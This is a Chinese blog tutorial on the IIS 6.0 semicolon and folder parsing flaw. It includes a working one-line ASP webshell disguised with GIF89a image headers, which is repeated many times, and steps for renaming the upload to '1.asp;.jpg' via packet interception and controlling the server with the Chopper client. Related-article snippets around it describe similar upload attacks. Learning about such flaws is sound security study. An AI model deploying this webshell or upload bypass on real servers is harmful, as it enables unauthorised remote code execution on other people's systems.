WEB攻防-ASP中间件IIS文件上传解析安全漏洞

最新推荐文章于 2024-09-19 18:29:18 发布
最新推荐文章于 2024-09-19 18:29:18 发布
阅读量298 收藏
点赞数 2
分类专栏: 网络安全 ASP特性常见漏洞 文章标签: 网络安全 IIS漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45534587/article/details/138139510
版权
本文详细描述了IIS6.0的一个安全漏洞,通过在文件名中使用分号截断,攻击者可以将.jpg文件伪装成.asp执行ASP代码,实现恶意文件的上传和执行。作者演示了如何利用这个漏洞创建木马文件,并通过网络工具实现攻击。
摘要由CSDN通过智能技术生成

漏洞原理:

  • 基于文件

        IIS6.0默认不解析;号后面的内容,例如1.asp;.jpg会当成1.asp解析,相当于分号截断。

  • 基于文件夹

        IIS6.0会将/*.asp/文件夹下的文件当成asp解析。

案例:

写一个木马文件,并改为jpg后缀

GIF89agif89A<%eval request("pass")%>GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
<%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%>

 如果不修改前缀上传就是正常访问图片

通过抓包给文件加上1.asp;.的前缀,使他保存的时候可以被执行


 

当加上前缀上传成功后,这时候就触发了IIS6.0默认不解析;号后面的内容,可以看到文件被当作asp解析了

我们用菜刀就可以链接成功了

 

癞皮狗不赖皮
关注
专栏目录
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
热门推荐
杨秀璋的专栏
11-19 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web安全学习路线,并实现了最简单的木马和病毒代码。这篇文章将详细讲述Shodan搜索引擎的基本用法及Python命令行,具体内容包括Shodan获取指定IP地址信息、Shodan获取账号信息、Shodan获取自身外部IP地址、Shodan检测是否有蜜罐等。
Web后端服务平台解析漏洞与修复、文件包含漏洞详解
最新发布
CoffeMilk的博客
09-19 1465
Web网站的运行一般需要后端的服务器平台提供服务解析服务,常见的服务器平台有Apache、Nginx、IIS,而同一服务器下不同版本的服务平台又有不同的解析漏洞。 文件包含操作,在目前流行的开发语言(Java、C#、python、php、...)中都会提供;但是PHP对于文件包含所提供的功能太强大,太灵活,故包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏洞只出现PHP语言之中,其实在其它语言中也可能出现包含漏洞
任意文件上传下载漏洞原理及示例
m0_62480631的博客
03-29 1245
许多web应用程序因业务需要,提供文件下载功能,但是没有对用户下载的文件做限制,导致恶意用户能够下载敏感文件。
IIS put上传漏洞
dqd66的博客
10-17 1531
2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞。导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件。IIS Put 上传漏洞前提 :1,IIS开启WebDAV。1.上传(使用PUT方法 上传文本文件 1.txt)3,设置站点目录权限,是的IIS用户不具有写入权限。//chopper是密码。IIS put上传漏洞
任意文件上传下载漏洞
gududeajun的博客
12-10 2009
任意文件上传 大多数网站都有文件上传的接口,但如果在后台开发时并没有对上传的文件进行安全考虑或采用了有缺陷的措施,导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件,从而通过该恶意文件的访问来控制整个后台测试流程 1、客户端检测绕过(javascript 检测) 首先观察到提示只允许上传图片文件,那么前端查看代码,当页面发生改变时,会调用这个checkFileExt函数来检查是不是图片,我们只需要将前端checkFileExt函数删除,就能上传一个个非图片文件。 2、服务端验证绕过.
网站漏洞的查找利用解析漏洞来绕过上传
网站安全专家
09-23 675
在日常对客户网站进行渗透测试服务的时候,我们SINE安全经常遇到客户网站,app存在文件上传功能,程序员在设计开发代码的过程中都会对上传的文件类型,格式,后缀名做安全效验与过滤判断,SINE安全工程师在对文件上传漏洞进行测试的时候,往往发现的网站漏洞都是由于服务器的环境漏洞导致的,像IIS,apache,nginx环境,都存在着可以导致任意文件上传漏洞。 关于导致文件上传漏洞的产生以及测试...
Web中间件常见漏洞总结
kalitips的博客
03-21 271
web渗透这个东西学起来如果没有头绪和路线的话,是非常烧脑的。理清web渗透学习思路,把自己的学习方案和需要学习的点全部整理,你会发现突然渗透思路就有点眉目了。程序员之间流行一个词,叫35岁危机,,意思就是说35岁是个坎,容易被淘汰。那么安全行业有这个坎吗?我觉得没有,因为安全和之前岗位不一样,年龄大的他经验更丰富,反而比较吃香,尤其很多大厂招聘要求都是5-10年,这没有30、40岁能有10年经验?网络安全好混,但不容易混得好。其实任何行业都是这样,想混得好,必须不断学习提升。
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1312
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
文件上传漏洞-01】文件上传漏洞概述、防御以及WebShell基础知识补充
m0_64378913的博客
05-31 2764
目录1 文件上传漏洞概述2 文件上传漏洞防御、绕过、利用2.1 黑白名单策略3 WebShell基础知识补充3.1 WebShell概述3.2 大马与小马 1 文件上传漏洞概述 概述:文件上传WEB应用必备功能之一,如上传头像、上传附件共享文件、上传脚本更新网站等,如果服务器配置不当或者没有进行足够的过滤,WEB用户就可以上传任意文件,包括恶意脚本文件、EXE程序等,这就造成了文件上传漏洞。 区分上传到哪: 上传文件:往往是将文件向服务器某目录中写入; 提交数据:像注册用户或留言等,往往是向数据库中
WEB | 文件上传漏洞
weixin_47982238的博客
10-13 1018
今天在攻防世界做了一道关于文件上传webCTF题,就想着系统地把文件上传漏洞的知识点整理一下,方便日后查阅。 什么是文件上传文件上传包括了上传头像,上传相册,上传附件,添加新闻图片,自定义主题背景,新闻投稿等等,一个很简单的栗子就是微信或者QQ的头像上传功能,或者上传到百度云这种 什么是文件上传漏洞文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这
上传后缀绕过
12-13
在上传的限制不能上传某些的后缀,对于上传中各绕过的描述
文件上传IIS6.0 目录解析漏洞
野原新之助
11-23 875
简述: 题目链接:Webshell文件上传 原理:利用IIS6.0服务器的目录解析漏洞IIS6.0解析漏洞:对目录名为***.asp下的所有文件,都以asp文件类型进行解析。 整个题目进行了三次尝试: 查看js脚本并禁用(失败,后台也有检测) 更改文件为jpg后缀抓包改回php(失败,文件名被更改,路径未知,无法定位文件) 针对IIS6.0的漏洞,进行重写目录(成功!) 过程: 查看服务...
IIS PUT任意上传漏洞
weixin_48474855的博客
12-20 924
2、复现IIS PUT任意上传漏洞(过程,步骤,说明) 设置地址和协议 开启服务webdav 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、 HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解 打开权读取和写入权限 测试能否连接成功 要允许来宾账号的写入,后面的上传才能成功 上传文件木马 选择PUT上传这里后缀为txt,然后提交数据包,会在服务端生成一个test.txt的文件
文件上传IIS—put漏洞
一个普普通通的博客
03-16 4802
iis—put漏洞
应用于ASP文件上传漏洞的0×00截断***
weixin_34000916的博客
10-24 305
应用于ASP文件上传漏洞的0×00截断*** kingbase 2011/8/1 中国人的简单叙述 这篇文章翻译自:0×00 vs ASP file uploads,原作者是:Brett Moore,Security-Assessment.com公司的,本文写于04年,原文在这里:http:// www.security-assessment.com/Whitepaper...
上传任意文件或者上传漏洞
q908544703的博客
06-02 7712
1.上传任意文件 缺陷描述: 允许用户上传文件可能会让攻击者注入危险内容或恶意代码,并在服务器上运行。举例如下: 2.上传漏洞 问题描述:没有对上传文件扩展名进行限制或者限制可以被绕过。 整改方案: 1.校验文件格式 2.通过文件头校验文件格式 3.文件大小校验 4.文件重命名 1.校验文件格式(配置上传白名单) 1.通过文件头校验文件格式(通过获取文件头文件类型和配置上传白名单比较) ...
ASP上传漏洞
weixin_33739523的博客
06-01 146
经常听说的ASP上传漏洞,即是将一些木马文件修改后缀名(修改为图像文件后缀),进行上传。针对此情况使用下列函数进行辨别: <%'******************************************************************'CheckFileType 函数用来检查文件是否为图片文件'参数filename是本地文件的路径'如果是文件jpeg,gif...
文件上传iis编辑器漏洞
一个普普通通的博客
03-24 2143
文件上传iis编辑器漏洞
IIS6.0解析漏洞——PUT方式上传文件
buffedon的博客
08-26 4082
IIS6.0解析漏洞IIS6.0解析漏洞解析漏洞原理介绍PUT上传原理PUT上传探测PUT上传利用(漏洞复现)PUT的利用COPY的利用PUT文件上传防范解析漏洞防范补充:HTTP 中请求方式汇总1. OPTION2. HEAD3. PUT4. DELETE5. TRACE6. CONNECT IIS6.0解析漏洞 解析漏洞原理介绍 1. 当建立 *.asa、*.asp 格式的文件夹时,其目录下的任意文件都被IIS当做asp文件解析 2. 当文件是 *.asp;1.jpg ,IIS6.0同样会将文件作为a
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

癞皮狗不赖皮

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值